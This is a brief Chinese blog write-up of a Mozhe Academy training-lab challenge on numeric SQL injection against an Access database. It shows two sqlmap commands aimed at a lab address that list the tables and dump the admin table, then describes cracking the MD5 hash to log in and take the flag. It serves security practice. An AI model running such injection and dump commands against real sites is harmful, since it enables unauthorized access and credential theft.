去B站咯

SQL数字型注入(Access数据库)

靶场:墨者学院

链接:https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe

打开靶场后,发现还是和上一题是一样的靶场,只不过数据库的类型变了。

同样,我们打开可能有注入漏洞的页面。用同样的方式去注入后,我们能够确定该页面存在数字型的sql注入。

打开kali,使用sqlmap跑出Access数据库的数据表。

sqlmap -u "http://219.153.49.228:48342/new_list.asp?id=1" --tables

跑出admin数据表中的数据。

sqlmap -u "http://219.153.49.228:48342/new_list.asp?id=1" -T admin --dump

这是一个16位的md5密文。使用在线网站即可解密,然后登陆,就能得到最后的flag.

posted @ 2020-05-05 12:45  不想长大a  阅读(180)  评论(0编辑  收藏  举报